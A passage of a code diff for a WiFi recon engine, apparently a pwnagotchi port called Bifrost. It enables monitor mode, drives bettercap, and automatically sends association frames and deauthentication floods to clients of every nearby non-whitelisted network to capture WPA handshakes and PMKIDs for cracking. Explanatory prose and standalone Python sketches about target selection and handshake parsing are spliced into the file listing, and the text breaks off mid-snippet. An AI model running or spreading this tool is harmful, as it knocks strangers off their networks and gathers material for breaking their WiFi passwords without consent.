"mode. For Broadcom chips (Pi Zero W/2W), install nexmon: "
"https://github.com/seemoo-lab/nexmon — "
"Or use an external USB WiFi adapter with monitor mode support.")
# Teardown first (restores network services) BEFORE switching mode,
# so the orchestrator doesn't start scanning on a dead network.
self._teardown_monitor_mode()
self._running = False
# Now switch mode back to AUTO — the network should be restored.
# We set the flag directly FIRST (bypass setter to avoid re-stopping),
# then ensure manual_mode/ai_mode are cleared so getter returns AUTO.
try:
self.shared_data.config["bifrost_enabled"] = False
self.shared_data.config["manual_mode"] = False
self.shared_data.config["ai_mode"] = False
self.shared_data.manual_mode = False
self.shared_data.ai_mode = False
self.shared_data.invalidate_config_cache()
logger.info("Bifrost auto-disabled due to monitor mode failure — mode: AUTO")
except Exception:
pass
return
# Start bettercap
self._start_bettercap()
self._stop_event.wait(3) # Give bettercap time to initialize
if self._stop_event.is_set():
return
# Create agent (pass stop_event so its threads exit cleanly)
from bifrost.agent import BifrostAgent
self.agent = BifrostAgent(self.shared_data, stop_event=self._stop_event)
# Load plugins
bfplugins.load(self.shared_data.config)
# Initialize agent
self.agent.start()
logger.info("Bifrost agent started — entering recon cycle")
# Main recon loop (port of do_auto_mode from pwnagotchi)
while not self._stop_event.is_set():
try:
# Full spectrum scan
self.agent.recon()
if self._stop_event.is_set():
break
# Get APs grouped by channel
channels = self.agent.get_access_points_by_channel()
# For each channel
for ch, aps in channels:
if self._stop_event.is_set():
break
self.agent.set_channel(ch)
# For each AP on this channel
for ap in aps:
if self._stop_event.is_set():
break
# Send association frame for PMKID
self.agent.associate(ap)
# Deauth all clients for full handshake
for sta in ap.get('clients', []):
if self._stop_event.is_set():
break
self.agent.deauth(ap, sta)
if not self._stop_event.is_set():
self.agent.next_epoch()
except Exception as e:
if 'wifi.interface not set' in str(e):
logger.error("WiFi interface lost: %s", e)
self._stop_event.wait(60)
if not self._stop_event.is_set():
self.agent.next_epoch()
else:
logger.error("Recon loop error: %s", e)
self._stop_event.wait(5)
except Exception as e:
logger.error("Bifrost engine fatal error: %s", e)
finally:
from bifrost import plugins as bfplugins
bfplugins.shutdown()
self._stop_bettercap()
self._teardown_monitor_mode()
self._running = False
# ── Monitor mode management ─────────────────────────
# ── Nexmon helpers ────────────────────────────────────
@staticmethod
def _has_nexmon():
"""Check if nexmon firmware patches are installed."""
import shutil
if not shutil.which('nexutil'):
return False
# Verify patched firmware via dmesg
try:
r = subprocess.run(
['dmesg'], capture_output=True, text=True, timeout=5)
if 'nexmon' in r.stdout.lower():
return True
except Exception:
pass
# nexutil exists — assume usable even without dmesg confirmation
return True
@staticmethod
def _is_brcmfmac(iface):
"""Check if the interface uses the brcmfmac driver (Broadcom)."""
driver_path = '/sys/class/net/%s/device/driver' % iface
try:
real = os.path.realpath(driver_path)
return 'brcmfmac' in real
except Exception:
return False
def _detect_phy(self, iface):
"""Detect the phy name for a given interface (e.g. 'phy0')."""
try:
r = subprocess.run(
['iw', 'dev', iface, 'info'],
capture_output=True, text=True, timeout=5)
for line in r.stdout.splitlines():
if 'wiphy' in line:
idx = line.strip().split()[-1]
return 'phy%s' % idx
except Exception:
pass
return 'phy0'
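# Example: if "iw dev wlan0 info" prints a line "wiphy 0", the last
# whitespace-separated token is "0" and _detect_phy returns "phy0".
# On any error it falls back to "phy0", which is usually correct on
# single-radio Pi boards.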
def _setup_monitor_mode(self):
"""Put the WiFi interface into monitor mode.
Strategy order:
1. Nexmon — for Broadcom brcmfmac chips (Pi Zero W / Pi Zero 2 W)
Uses: iw phy <phy> interface add mon0 type monitor + nexutil -m2
2. airmon-ng — for chipsets with proper driver support (Atheros, Realtek, etc.)
3. iw — direct fallback for other drivers
"""
self._monitor_torn_down = False
self._nexmon_used = False
cfg = self.shared_data.config
iface = cfg.get('bifrost_iface', 'wlan0mon')
# If configured iface already ends with 'mon', derive the base name
if iface.endswith('mon'):
base_iface = iface[:-3] # e.g. 'wlan0mon' -> 'wlan0'
else:
base_iface = iface
# Store original interface name for teardown
self._base_iface = base_iface
self._mon_iface = iface
# Check if a monitor interface already exists
if iface != base_iface and self._iface_exists(iface):
logger.info("Monitor interface %s already exists", iface)
return
# ── Strategy 1: Nexmon (Broadcom brcmfmac) ────────────────
if self._is_brcmfmac(base_iface):
logger.info("Broadcom brcmfmac chip detected on %s", base_iface)
if self._has_nexmon():
if self._setup_nexmon(base_iface, cfg):
return
# nexmon setup failed — don't try other strategies, they won't work either
self._monitor_failed = True
return
else:
logger.error(
"Broadcom brcmfmac chip requires nexmon firmware patches for "
"monitor mode. Install nexmon manually using install_nexmon.sh "
"or visit: https://github.com/seemoo-lab/nexmon")
self._monitor_failed = True
return
# ── Strategy 2: airmon-ng (Atheros, Realtek, etc.) ────────
airmon_ok = False
try:
logger.info("Killing interfering processes ...")
subprocess.run(
['airmon-ng', 'check', 'kill'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
timeout=15,
)
logger.info("Starting monitor mode: airmon-ng start %s", base_iface)
result = subprocess.run(
['airmon-ng', 'start', base_iface],
capture_output=True, text=True, timeout=30,
)
combined = (result.stdout + result.stderr).strip()
logger.info("airmon-ng output: %s", combined)
if 'Operation not supported' in combined or 'command failed' in combined:
logger.warning("airmon-ng failed: %s", combined)
else:
# airmon-ng may rename the interface (wlan0 -> wlan0mon)
if self._iface_exists(iface):
logger.info("Monitor mode active: %s", iface)
airmon_ok = True
elif self._iface_exists(base_iface):
logger.info("Interface %s is now in monitor mode (no rename)", base_iface)
cfg['bifrost_iface'] = base_iface
self._mon_iface = base_iface
airmon_ok = True
if airmon_ok:
return
except FileNotFoundError:
logger.warning("airmon-ng not found, trying iw fallback ...")
except Exception as e:
logger.warning("airmon-ng failed: %s, trying iw fallback ...", e)
# ── Strategy 3: iw (direct fallback) ──────────────────────
try:
subprocess.run(
['ip', 'link', 'set', base_iface, 'down'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
result = subprocess.run(
['iw', 'dev', base_iface, 'set', 'type', 'monitor'],
capture_output=True, text=True, timeout=10,
)
if result.returncode != 0:
err = result.stderr.strip()
logger.error("iw set monitor failed (rc=%d): %s", result.returncode, err)
self._monitor_failed = True
subprocess.run(
['ip', 'link', 'set', base_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
return
subprocess.run(
['ip', 'link', 'set', base_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
logger.info("Monitor mode set via iw on %s", base_iface)
cfg['bifrost_iface'] = base_iface
self._mon_iface = base_iface
except Exception as e:
logger.error("Failed to set monitor mode: %s", e)
self._monitor_failed = True
def _setup_nexmon(self, base_iface, cfg):
"""Enable monitor mode using nexmon (for Broadcom brcmfmac chips).
Creates a separate monitor interface (mon0) so wlan0 can potentially
remain usable for management traffic (like pwnagotchi does).
Returns True on success, False on failure.
"""
mon_iface = 'mon0'
phy = self._detect_phy(base_iface)
logger.info("Nexmon: setting up monitor mode on %s (phy=%s)", base_iface, phy)
try:
# Kill interfering services (same as pwnagotchi)
for svc in ('wpa_supplicant', 'NetworkManager', 'dhcpcd'):
subprocess.run(
['systemctl', 'stop', svc],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
# Remove old mon0 if it exists
if self._iface_exists(mon_iface):
subprocess.run(
['iw', 'dev', mon_iface, 'del'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
)
# Create monitor interface via iw phy
result = subprocess.run(
['iw', 'phy', phy, 'interface', 'add', mon_iface, 'type', 'monitor'],
capture_output=True, text=True, timeout=10,
)
if result.returncode != 0:
logger.error("Failed to create %s: %s", mon_iface, result.stderr.strip())
return False
# Bring monitor interface up
subprocess.run(
['ifconfig', mon_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
# Enable monitor mode with radiotap headers via nexutil
result = subprocess.run(
['nexutil', '-m2'],
capture_output=True, text=True, timeout=10,
)
if result.returncode != 0:
logger.warning("nexutil -m2 returned rc=%d: %s", result.returncode, result.stderr.strip())
# Verify
verify = subprocess.run(
['nexutil', '-m'],
capture_output=True, text=True, timeout=5,
)
mode_val = verify.stdout.strip()
logger.info("nexutil -m reports: %s", mode_val)
if not self._iface_exists(mon_iface):
logger.error("Monitor interface %s not created", mon_iface)
return False
# Success — update config to use mon0
cfg['bifrost_iface'] = mon_iface
self._mon_iface = mon_iface
self._nexmon_used = True
logger.info("Nexmon monitor mode active on %s (phy=%s)", mon_iface, phy)
return True
except FileNotFoundError as e:
logger.error("Required tool not found: %s", e)
return False
except Exception as e:
logger.error("Nexmon setup error: %s", e)
return False
def _teardown_monitor_mode(self):
"""Restore the WiFi interface to managed mode (idempotent)."""
if self._monitor_torn_down:
return
base_iface = getattr(self, '_base_iface', None)
mon_iface = getattr(self, '_mon_iface', None)
if not base_iface:
return
self._monitor_torn_down = True
logger.info("Restoring managed mode for %s ...", base_iface)
if getattr(self, '_nexmon_used', False):
# ── Nexmon teardown ──
try:
subprocess.run(
['nexutil', '-m0'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
)
logger.info("Nexmon monitor mode disabled (nexutil -m0)")
except Exception:
pass
# Remove the mon0 interface
if mon_iface and mon_iface != base_iface and self._iface_exists(mon_iface):
try:
subprocess.run(
['iw', 'dev', mon_iface, 'del'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
)
logger.info("Removed monitor interface %s", mon_iface)
except Exception:
pass
else:
# ── airmon-ng / iw teardown ──
try:
iface_to_stop = mon_iface or base_iface
subprocess.run(
['airmon-ng', 'stop', iface_to_stop],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
timeout=15,
)
logger.info("Monitor mode stopped via airmon-ng")
except FileNotFoundError:
try:
subprocess.run(
['ip', 'link', 'set', base_iface, 'down'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
subprocess.run(
['iw', 'dev', base_iface, 'set', 'type', 'managed'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
subprocess.run(
['ip', 'link', 'set', base_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
logger.info("Managed mode restored via iw on %s", base_iface)
except Exception as e:
logger.error("Failed to restore managed mode: %s", e)
except Exception as e:
logger.warning("airmon-ng stop failed: %s", e)
# Restart network services that were killed
restarted = False
for svc in ('wpa_supplicant', 'dhcpcd', 'NetworkManager'):
try:
subprocess.run(
['systemctl', 'start', svc],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=15,
)
restarted = True
except Exception:
pass
# Wait for network services to actually reconnect before handing
# control back so the orchestrator doesn't scan a dead interface.
if restarted:
logger.info("Waiting for network services to reconnect ...")
time.sleep(5)
@staticmethod
def _iface_exists(iface_name):
"""Check if a network interface exists."""
return os.path.isdir('/sys/class/net/%s' % iface_name)
# ── Bettercap subprocess management ────────────────
def _start_bettercap(self):
"""Spawn bettercap subprocess with REST API."""
cfg = self.shared_data.config
iface = cfg.get('bifrost_iface', 'wlan0mon')
host = cfg.get('bifrost_bettercap_host', '127.0.0.1')
port = str(cfg.get('bifrost_bettercap_port', 8081))
user = cfg.get('bifrost_bettercap_user', 'user')
password = cfg.get('bifrost_bettercap_pass', 'pass')
cmd = [
'bettercap', '-iface', iface, '-no-colors',
'-eval', 'set api.rest.address %s' % host,
'-eval', 'set api.rest.port %s' % port,
'-eval', 'set api.rest.username %s' % user,
'-eval', 'set api.rest.password %s' % password,
'-eval', 'api.rest on',
]
logger.info("Starting bettercap: %s", ' '.join(cmd))
try:
self._bettercap_proc = subprocess.Popen(
cmd,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
logger.info("bettercap PID: %d", self._bettercap_proc.pid)
except FileNotFoundError:
logger.error("bettercap not found! Install with: apt install bettercap")
raise
except Exception as e:
logger.error("Failed to start bettercap: %s", e)
raise
def _stop_bettercap(self):
"""Kill the bettercap subprocess."""
if self._bettercap_proc:
try:
self._bettercap_proc.terminate()
self._bettercap_proc.wait(timeout=5)
except subprocess.TimeoutExpired:
self._bettercap_proc.kill()
except Exception:
pass
self._bettercap_proc = None
logger.info("bettercap stopped")
# ── Status for web API ────────────────────────────────
def get_status(self):
"""Return full engine status for web API."""
base = {
'enabled': self.enabled,
'running': self._running,
'monitor_failed': self._monitor_failed,
}
if self.agent and self._running:
base.update(self.agent.get_status())
else:
base.update({
'mood': 'sleeping',
'face': '(-.-) zzZ',
'voice': '',
'channel': 0,
'num_aps': 0,
'num_handshakes': 0,
'uptime': 0,
'epoch': 0,
'mode': 'auto',
'last_pwnd': '',
'reward': 0,
})
return base

bifrost/agent.py (new file, 568 lines)

@@ -0,0 +1,568 @@
"""
Bifrost — WiFi recon agent.
Ported from pwnagotchi/agent.py using composition instead of inheritance.
"""
import time
import json
import os
import re
import asyncio
import threading
import logging
from bifrost.bettercap import BettercapClient
from bifrost.automata import BifrostAutomata
from bifrost.epoch import BifrostEpoch
from bifrost.voice import BifrostVoice
from bifrost import plugins
from logger import Logger
logger = Logger(name="bifrost.agent", level=logging.DEBUG)
class BifrostAgent:
"""WiFi recon agent — drives bettercap, captures handshakes, tracks epochs."""
def __init__(self, shared_data, stop_event=None):
self.shared_data = shared_data
self._config = shared_data.config
self.db = shared_data.db
self._stop_event = stop_event or threading.Event()
# Sub-systems
cfg = self._config
self.bettercap = BettercapClient(
hostname=cfg.get('bifrost_bettercap_host', '127.0.0.1'),
scheme='http',
port=int(cfg.get('bifrost_bettercap_port', 8081)),
username=cfg.get('bifrost_bettercap_user', 'user'),
password=cfg.get('bifrost_bettercap_pass', 'pass'),
)
self.automata = BifrostAutomata(cfg)
self.epoch = BifrostEpoch(cfg)
self.voice = BifrostVoice()
self._started_at = time.time()
self._filter = None
flt = cfg.get('bifrost_filter', '')
if flt:
try:
self._filter = re.compile(flt)
except re.error:
logger.warning("Invalid bifrost_filter regex: %s", flt)
self._current_channel = 0
self._tot_aps = 0
self._aps_on_channel = 0
self._supported_channels = list(range(1, 15))
self._access_points = []
self._last_pwnd = None
self._history = {}
self._handshakes = {}
self.mode = 'auto'
# Whitelist
self._whitelist = [
w.strip().lower() for w in
str(cfg.get('bifrost_whitelist', '')).split(',') if w.strip()
]
# Channels
self._channels = [
int(c.strip()) for c in
str(cfg.get('bifrost_channels', '')).split(',') if c.strip()
]
# Ensure handshakes dir
hs_dir = cfg.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes')
if hs_dir and not os.path.exists(hs_dir):
try:
os.makedirs(hs_dir, exist_ok=True)
except OSError:
pass
# ── Lifecycle ─────────────────────────────────────────
def start(self):
"""Initialize bettercap, start monitor mode, begin event polling."""
self._wait_bettercap()
self.setup_events()
self.automata.set_starting()
self._log_activity('system', 'Bifrost starting', self.voice.on_starting())
self.start_monitor_mode()
self.start_event_polling()
self.start_session_fetcher()
self.next_epoch()
self.automata.set_ready()
self._log_activity('system', 'Bifrost ready', self.voice.on_ready())
def setup_events(self):
"""Silence noisy bettercap events."""
logger.info("connecting to %s ...", self.bettercap.url)
silence = [
'ble.device.new', 'ble.device.lost', 'ble.device.disconnected',
'ble.device.connected', 'ble.device.service.discovered',
'ble.device.characteristic.discovered',
'mod.started', 'mod.stopped', 'update.available',
'session.closing', 'session.started',
]
for tag in silence:
try:
self.bettercap.run('events.ignore %s' % tag, verbose_errors=False)
except Exception:
pass
def _reset_wifi_settings(self):
iface = self._config.get('bifrost_iface', 'wlan0mon')
self.bettercap.run('set wifi.interface %s' % iface)
self.bettercap.run('set wifi.ap.ttl %d' % self._config.get('bifrost_personality_ap_ttl', 120))
self.bettercap.run('set wifi.sta.ttl %d' % self._config.get('bifrost_personality_sta_ttl', 300))
self.bettercap.run('set wifi.rssi.min %d' % self._config.get('bifrost_personality_min_rssi', -200))
hs_dir = self._config.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes')
self.bettercap.run('set wifi.handshakes.file %s' % hs_dir)
self.bettercap.run('set wifi.handshakes.aggregate false')
def start_monitor_mode(self):
"""Wait for monitor interface and start wifi.recon."""
iface = self._config.get('bifrost_iface', 'wlan0mon')
has_mon = False
retries = 0
while not has_mon and retries < 30 and not self._stop_event.is_set():
try:
s = self.bettercap.session()
for i in s.get('interfaces', []):
if i['name'] == iface:
logger.info("found monitor interface: %s", i['name'])
has_mon = True
break
except Exception:
pass
if not has_mon:
logger.info("waiting for monitor interface %s ... (%d)", iface, retries)
self._stop_event.wait(2)
retries += 1
if not has_mon:
logger.warning("monitor interface %s not found after %d retries", iface, retries)
# Detect supported channels
try:
from bifrost.compat import _build_utils_shim
self._supported_channels = _build_utils_shim(self.shared_data).iface_channels(iface)
except Exception:
self._supported_channels = list(range(1, 15))
logger.info("supported channels: %s", self._supported_channels)
self._reset_wifi_settings()
# Start wifi recon
try:
wifi_running = self._is_module_running('wifi')
if wifi_running:
self.bettercap.run('wifi.recon off; wifi.recon on')
self.bettercap.run('wifi.clear')
else:
self.bettercap.run('wifi.recon on')
except Exception as e:
err_msg = str(e)
if 'Operation not supported' in err_msg or 'EOPNOTSUPP' in err_msg:
logger.error(
"wifi.recon failed: %s — Your WiFi chip likely does NOT support "
"monitor mode. The built-in Broadcom chip on Raspberry Pi Zero/Zero 2 "
"has limited monitor mode support. Use an external USB WiFi adapter "
"(e.g. Alfa AWUS036ACH, Panda PAU09) that supports monitor mode and "
"packet injection.", e)
self._log_activity('error',
'WiFi chip does not support monitor mode',
'Use an external USB WiFi adapter with monitor mode support')
else:
logger.error("Error starting wifi.recon: %s", e)
def _wait_bettercap(self):
retries = 0
while retries < 30 and not self._stop_event.is_set():
try:
self.bettercap.session()
return
except Exception:
logger.info("waiting for bettercap API ...")
self._stop_event.wait(2)
retries += 1
if not self._stop_event.is_set():
raise Exception("bettercap API not available after 60s")
def _is_module_running(self, module):
try:
s = self.bettercap.session()
for m in s.get('modules', []):
if m['name'] == module:
return m['running']
except Exception:
pass
return False
# ── Recon cycle ───────────────────────────────────────
def recon(self):
"""Full-spectrum WiFi scan for recon_time seconds."""
recon_time = self._config.get('bifrost_personality_recon_time', 30)
max_inactive = 3
recon_mul = 2
if self.epoch.inactive_for >= max_inactive:
recon_time *= recon_mul
self._current_channel = 0
if not self._channels:
logger.debug("RECON %ds (all channels)", recon_time)
try:
self.bettercap.run('wifi.recon.channel clear')
except Exception:
pass
else:
ch_str = ','.join(map(str, self._channels))
logger.debug("RECON %ds on channels %s", recon_time, ch_str)
try:
self.bettercap.run('wifi.recon.channel %s' % ch_str)
except Exception as e:
logger.error("Error setting recon channels: %s", e)
self.automata.wait_for(recon_time, self.epoch, sleeping=False,
stop_event=self._stop_event)
def _filter_included(self, ap):
if self._filter is None:
return True
return (self._filter.match(ap.get('hostname', '')) is not None or
self._filter.match(ap.get('mac', '')) is not None)
def get_access_points(self):
"""Fetch APs from bettercap, filter whitelist and open networks."""
aps = []
try:
s = self.bettercap.session()
all_aps = s.get('wifi', {}).get('aps', [])
plugins.on("unfiltered_ap_list", all_aps)
for ap in all_aps:
enc = ap.get('encryption', '')
if enc == '' or enc == 'OPEN':
continue
hostname = ap.get('hostname', '').lower()
mac = ap.get('mac', '').lower()
prefix = mac[:8]
if (hostname not in self._whitelist and
mac not in self._whitelist and
prefix not in self._whitelist):
if self._filter_included(ap):
aps.append(ap)
except Exception as e:
logger.error("Error getting APs: %s", e)
aps.sort(key=lambda a: a.get('channel', 0))
self._access_points = aps
plugins.on('wifi_update', aps)
self.epoch.observe(aps, list(self.automata.peers.values()))
# Update DB with discovered networks
self._persist_networks(aps)
return aps
def get_access_points_by_channel(self):
"""Get APs grouped by channel, sorted by density."""
aps = self.get_access_points()
grouped = {}
for ap in aps:
ch = ap.get('channel', 0)
if self._channels and ch not in self._channels:
continue
grouped.setdefault(ch, []).append(ap)
return sorted(grouped.items(), key=lambda kv: len(kv[1]), reverse=True)
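The channel-grouping step above is pure logic and can be exercised in isolation. A minimal sketch with made-up AP dicts (the `group_by_channel` helper name is illustrative, not part of the agent's API):

```python
# Standalone sketch of get_access_points_by_channel(): group APs by
# channel, then sort groups by density so the busiest channel comes first.
def group_by_channel(aps, allowed_channels=None):
    grouped = {}
    for ap in aps:
        ch = ap.get('channel', 0)
        if allowed_channels and ch not in allowed_channels:
            continue
        grouped.setdefault(ch, []).append(ap)
    return sorted(grouped.items(), key=lambda kv: len(kv[1]), reverse=True)

aps = [
    {'mac': 'aa:bb:cc:00:00:01', 'channel': 6},
    {'mac': 'aa:bb:cc:00:00:02', 'channel': 6},
    {'mac': 'aa:bb:cc:00:00:03', 'channel': 1},
]
busiest = group_by_channel(aps)[0]
print(busiest[0])  # channel with the most APs
```

Hopping to the densest channel first maximizes the number of reachable targets per epoch.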
# ── Actions ───────────────────────────────────────────
def _should_interact(self, who):
if self._has_handshake(who):
return False
if who not in self._history:
self._history[who] = 1
return True
self._history[who] += 1
max_int = self._config.get('bifrost_personality_max_interactions', 3)
return self._history[who] < max_int
def _has_handshake(self, bssid):
for key in self._handshakes:
if bssid.lower() in key:
return True
return False
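The interaction budget enforced by `_should_interact` can be lifted out and tested standalone. The sketch below mirrors its counting logic (the `make_budget` wrapper is a hypothetical name added for illustration):

```python
# Reproduction of the _should_interact() budget: the first attempt on a
# target always passes, and later attempts pass only while the running
# count stays below max_interactions. Targets with a captured handshake
# are skipped entirely.
def make_budget(max_interactions=3):
    history = {}
    def should_interact(who, has_handshake=False):
        if has_handshake:
            return False  # already pwned this target
        if who not in history:
            history[who] = 1
            return True
        history[who] += 1
        return history[who] < max_interactions
    return should_interact

check = make_budget(max_interactions=3)
results = [check('de:ad:be:ef:00:01') for _ in range(5)]
print(results)
```

Note that with `max_interactions=3` a target is actually engaged twice (the strict `<` after increment stops the third attempt), matching the original code's behavior.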
def associate(self, ap, throttle=0):
"""Send association frame to trigger PMKID."""
if self.automata.is_stale(self.epoch):
return
if (self._config.get('bifrost_personality_associate', True) and
self._should_interact(ap.get('mac', ''))):
try:
hostname = ap.get('hostname', ap.get('mac', '?'))
logger.info("ASSOC %s (%s) ch=%d rssi=%d",
hostname, ap.get('mac', ''), ap.get('channel', 0), ap.get('rssi', 0))
self.bettercap.run('wifi.assoc %s' % ap['mac'])
self.epoch.track(assoc=True)
self._log_activity('assoc', 'Association: %s' % hostname,
self.voice.on_assoc(hostname))
except Exception as e:
self.automata.on_error(ap.get('mac', ''), e)
plugins.on('association', ap)
if throttle > 0:
time.sleep(throttle)
def deauth(self, ap, sta, throttle=0):
"""Deauthenticate client to capture handshake."""
if self.automata.is_stale(self.epoch):
return
if (self._config.get('bifrost_personality_deauth', True) and
self._should_interact(sta.get('mac', ''))):
try:
logger.info("DEAUTH %s (%s) from %s ch=%d",
sta.get('mac', ''), sta.get('vendor', ''),
ap.get('hostname', ap.get('mac', '')), ap.get('channel', 0))
self.bettercap.run('wifi.deauth %s' % sta['mac'])
self.epoch.track(deauth=True)
self._log_activity('deauth', 'Deauth: %s' % sta.get('mac', ''),
self.voice.on_deauth(sta.get('mac', '')))
except Exception as e:
self.automata.on_error(sta.get('mac', ''), e)
plugins.on('deauthentication', ap, sta)
if throttle > 0:
time.sleep(throttle)
def set_channel(self, channel, verbose=True):
"""Hop to a specific WiFi channel."""
if self.automata.is_stale(self.epoch):
return
wait = 0
if self.epoch.did_deauth:
wait = self._config.get('bifrost_personality_hop_recon_time', 10)
elif self.epoch.did_associate:
wait = self._config.get('bifrost_personality_min_recon_time', 5)
if channel != self._current_channel:
if self._current_channel != 0 and wait > 0:
logger.debug("waiting %ds on channel %d", wait, self._current_channel)
self.automata.wait_for(wait, self.epoch, stop_event=self._stop_event)
try:
self.bettercap.run('wifi.recon.channel %d' % channel)
self._current_channel = channel
self.epoch.track(hop=True)
plugins.on('channel_hop', channel)
except Exception as e:
logger.error("Error setting channel: %s", e)
def next_epoch(self):
"""Transition to next epoch — evaluate mood."""
self.automata.next_epoch(self.epoch)
# Persist epoch to DB
data = self.epoch.data()
self._persist_epoch(data)
self._log_activity('epoch', 'Epoch %d' % (self.epoch.epoch - 1),
self.voice.on_epoch(self.epoch.epoch - 1))
# ── Event polling ─────────────────────────────────────
def start_event_polling(self):
"""Start event listener in background thread.
Tries websocket first; falls back to REST polling if the
``websockets`` package is not installed.
"""
t = threading.Thread(target=self._event_poller, daemon=True, name="BifrostEvents")
t.start()
def _event_poller(self):
try:
self.bettercap.run('events.clear')
except Exception:
pass
# Probe once whether websockets is available
try:
import websockets # noqa: F401
has_ws = True
except ImportError:
has_ws = False
logger.warning("websockets package not installed — using REST event polling "
"(pip install websockets for real-time events)")
if has_ws:
self._ws_event_loop()
else:
self._rest_event_loop()
def _ws_event_loop(self):
"""Websocket-based event listener (preferred)."""
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
while not self._stop_event.is_set():
try:
loop.run_until_complete(self.bettercap.start_websocket(
self._on_event, self._stop_event))
except Exception as ex:
if self._stop_event.is_set():
break
logger.debug("Event poller error: %s", ex)
self._stop_event.wait(5)
loop.close()
def _rest_event_loop(self):
"""REST-based fallback event poller — polls /api/events every 2s."""
while not self._stop_event.is_set():
try:
events = self.bettercap.events()
for ev in (events or []):
if ev.get('tag', '') == 'wifi.client.handshake':
# Reuse the async websocket handler for REST-polled events
asyncio.run(self._on_event(json.dumps(ev)))
except Exception as ex:
logger.debug("REST event poll error: %s", ex)
self._stop_event.wait(2)
async def _on_event(self, msg):
"""Handle bettercap websocket events."""
try:
jmsg = json.loads(msg)
except json.JSONDecodeError:
return
if jmsg.get('tag') == 'wifi.client.handshake':
filename = jmsg.get('data', {}).get('file', '')
sta_mac = jmsg.get('data', {}).get('station', '')
ap_mac = jmsg.get('data', {}).get('ap', '')
key = "%s -> %s" % (sta_mac, ap_mac)
if key not in self._handshakes:
self._handshakes[key] = jmsg
self._last_pwnd = ap_mac
# Find AP info
ap_name = ap_mac
try:
s = self.bettercap.session()
for ap in s.get('wifi', {}).get('aps', []):
if ap.get('mac') == ap_mac:
if ap.get('hostname') and ap['hostname'] != '<hidden>':
ap_name = ap['hostname']
break
except Exception:
pass
logger.warning("!!! HANDSHAKE: %s -> %s !!!", sta_mac, ap_name)
self.epoch.track(handshake=True)
self._persist_handshake(ap_mac, sta_mac, ap_name, filename)
self._log_activity('handshake',
'Handshake: %s' % ap_name,
self.voice.on_handshakes(1))
plugins.on('handshake', filename, ap_mac, sta_mac)
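The handshake-event handling can be illustrated offline. The payload below is a made-up sample shaped like a bettercap `wifi.client.handshake` event, showing how `_on_event` derives its de-duplication key:

```python
import json

# Parse a (fabricated) wifi.client.handshake event and build the
# "station -> ap" key used to de-duplicate captured handshakes.
sample = json.dumps({
    'tag': 'wifi.client.handshake',
    'data': {'file': '/root/bifrost/handshakes/test.pcap',
             'station': 'aa:aa:aa:aa:aa:aa',
             'ap': 'bb:bb:bb:bb:bb:bb'},
})
jmsg = json.loads(sample)
data = jmsg.get('data', {})
key = "%s -> %s" % (data.get('station', ''), data.get('ap', ''))
print(key)
```

Keying on the station/AP pair means a re-captured handshake for the same client does not inflate the handshake count or re-trigger persistence.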
def start_session_fetcher(self):
"""Start background thread that polls bettercap for stats."""
t = threading.Thread(target=self._fetch_stats, daemon=True, name="BifrostStats")
t.start()
def _fetch_stats(self):
while not self._stop_event.is_set():
try:
s = self.bettercap.session()
self._tot_aps = len(s.get('wifi', {}).get('aps', []))
except Exception:
pass
self._stop_event.wait(2)
# ── Status for web API ────────────────────────────────
def get_status(self):
"""Return current agent state for the web API."""
return {
'mood': self.automata.mood,
'face': self.automata.face,
'voice': self.automata.voice_text,
'channel': self._current_channel,
'num_aps': self._tot_aps,
'num_handshakes': len(self._handshakes),
'uptime': int(time.time() - self._started_at),
'epoch': self.epoch.epoch,
'mode': self.mode,
'last_pwnd': self._last_pwnd or '',
'reward': self.epoch.data().get('reward', 0),
}
# ── DB persistence ────────────────────────────────────
def _persist_networks(self, aps):
"""Upsert discovered networks to DB."""
for ap in aps:
try:
self.db.execute(
"""INSERT INTO bifrost_networks
(bssid, essid, channel, encryption, rssi, vendor, num_clients, last_seen)
VALUES (?, ?, ?, ?, ?, ?, ?, CURRENT_TIMESTAMP)
ON CONFLICT(bssid) DO UPDATE SET
essid=excluded.essid, channel=excluded.channel,
encryption=excluded.encryption, rssi=excluded.rssi,
vendor=excluded.vendor, num_clients=excluded.num_clients,
last_seen=CURRENT_TIMESTAMP""",
(ap.get('mac', ''), ap.get('hostname', ''), ap.get('channel', 0),
ap.get('encryption', ''), ap.get('rssi', 0), ap.get('vendor', ''),
len(ap.get('clients', [])))
)
except Exception as e:
logger.debug("Error persisting network: %s", e)
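The upsert pattern used here can be demonstrated with an in-memory SQLite database. The schema below is a guess at the relevant columns (the real table is created elsewhere in Bjorn); SQLite's `excluded` alias refers to the row that failed to insert:

```python
import sqlite3

# In-memory demo of the bifrost_networks upsert: a re-seen AP updates
# its row in place instead of inserting a duplicate.
db = sqlite3.connect(':memory:')
db.execute("""CREATE TABLE bifrost_networks (
    bssid TEXT PRIMARY KEY, essid TEXT, rssi INTEGER,
    last_seen TEXT DEFAULT CURRENT_TIMESTAMP)""")
upsert = """INSERT INTO bifrost_networks (bssid, essid, rssi)
VALUES (?, ?, ?)
ON CONFLICT(bssid) DO UPDATE SET
essid=excluded.essid, rssi=excluded.rssi,
last_seen=CURRENT_TIMESTAMP"""
db.execute(upsert, ('aa:bb:cc:dd:ee:ff', 'HomeNet', -60))
db.execute(upsert, ('aa:bb:cc:dd:ee:ff', 'HomeNet', -55))  # same AP, fresher RSSI
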